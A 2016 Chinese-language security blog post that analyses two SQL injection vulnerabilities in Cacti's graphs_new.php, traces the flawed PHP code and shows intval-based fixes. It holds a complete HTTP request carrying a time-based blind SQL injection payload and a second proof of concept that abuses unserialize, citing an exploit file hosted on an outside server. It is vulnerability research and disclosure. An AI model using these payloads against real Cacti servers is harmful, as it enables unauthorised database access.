Chinaunix首页 | 论坛 | 博客
  • 博客访问: 289683
  • 博文数量: 66
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 455
  • 用 户 组: 普通用户
  • 注册时间: 2015-11-25 09:52
个人简介

no pains no gains

文章分类

全部博文(66)

文章存档

2017年(10)

2016年(39)

2015年(17)

我的朋友

分类: 网络与安全

2016-08-18 11:01:17

 

1. 漏洞描述

other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug

Relevant Link:

http://bobao.360.cn/snapshot/index?id=146936

 
2. 漏洞触发条件

0x1: POC1: SQL Inject

复制代码
POST /cacti/graphs_new.php HTTP/1.1 Host: 192.168.217.133 Proxy-Connection: keep-alive
Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin:  [^]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: /cacti/graphs_new.php?host_id=3 [^]
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save
复制代码

0x2: POC2: Object Inject

复制代码
1. Login 2. POST  http://target/cacti/graphs_new.php Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection]
    {Injection exp can be found on my server: http://pandas.pw/cacti.exp} 3. mysql log: select graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))--
复制代码


3. 漏洞影响范围
4. 漏洞代码分析

0x1: Vuls-1: Object Inject To SQL Inject

/graphs_new.php

复制代码
/* set default action */ if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; } switch ($_REQUEST["action"]) { case 'save': //track function form_save  form_save(); break; case 'query_reload':
        host_reload_query();

        header("Location: graphs_new.php?host_id=" . $_GET["host_id"]); break; default:
        include_once("./include/top_header.php");

        graphs();

        include_once("./include/bottom_footer.php"); break;
}
复制代码

form_save();

复制代码
function form_save() 
{
    .. if (isset($_POST["save_component_new_graphs"])) 
    { //Track function host_new_graphs_save()  host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}
复制代码

host_new_graphs_save();

复制代码
function host_new_graphs_save() 
{ //variable $selected_graphs_array just unserialized the POST variable which we can control without filter. $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));
    .. //Then the variable goes into a  three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection. $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);
    ..
}
复制代码

0x2: Vuls-2: SQL Injection

复制代码
function form_save() 
{ if (isset($_POST["save_component_graph"])) 
    { /* summarize the 'create graph from host template/snmp index' stuff into an array */ while (list($var, $val) = each($_POST)) 
        { if (preg_match('/^cg_(\d+)$/', $var, $matches)) 
            {
                $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;
            } //cg_g is not filtered elseif (preg_match('/^cg_g$/', $var)) 
            { if ($_POST["cg_g"] > 0) 
                {
                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;
                }
            }
            elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) 
            {
                $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
            }
        } if (isset($selected_graphs)) 
        { //外部输入参数带入host_new_graphs中 host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
            exit;
        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    } if (isset($_POST["save_component_new_graphs"])) {
        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}
复制代码

host_new_graphs(POST["hostid"],

_POST["host_template_id"], $selected_graphs);

复制代码
function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) { /* we use object buffering on this page to allow redirection to another page if no
    fields are actually drawn */ ob_start();

    include_once("./include/top_header.php");

    print "
\n"; $snmp_query_id = 0; $num_output_fields = array(); while (list($form_type, $form_array) = each($selected_graphs_array)) { while (list($form_id1, $form_array2) = each($form_array)) { if ($form_type == "cg") { //sql injection in graph_template_id $graph_template_id = $form_id1; html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");
复制代码

Relevant Link:

http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt http://bugs.cacti.net/view.php?id=2652


5. 防御方法

/graphs_new.php

复制代码
function host_new_graphs_save() 
{
    .. /*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/ $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));
    ..
}
复制代码

/graphs_new.php

复制代码
function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) { /* we use object buffering on this page to allow redirection to another page if no
    fields are actually drawn */ ob_start();

    include_once("./include/top_header.php");

    print "\n";

    $snmp_query_id = 0;
    $num_output_fields = array(); while (list($form_type, $form_array) = each($selected_graphs_array)) { while (list($form_id1, $form_array2) = each($form_array)) { if ($form_type == "cg") { //sql injection in graph_template_id  $graph_template_id = $form_id1; /**/ $graph_template_id = intval($graph_template_id); /**/ html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");
复制代码

Relevant Link:

http://


6. 攻防思考

Copyright (c) 2016 Little5ann All rights reserved

阅读(1559) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~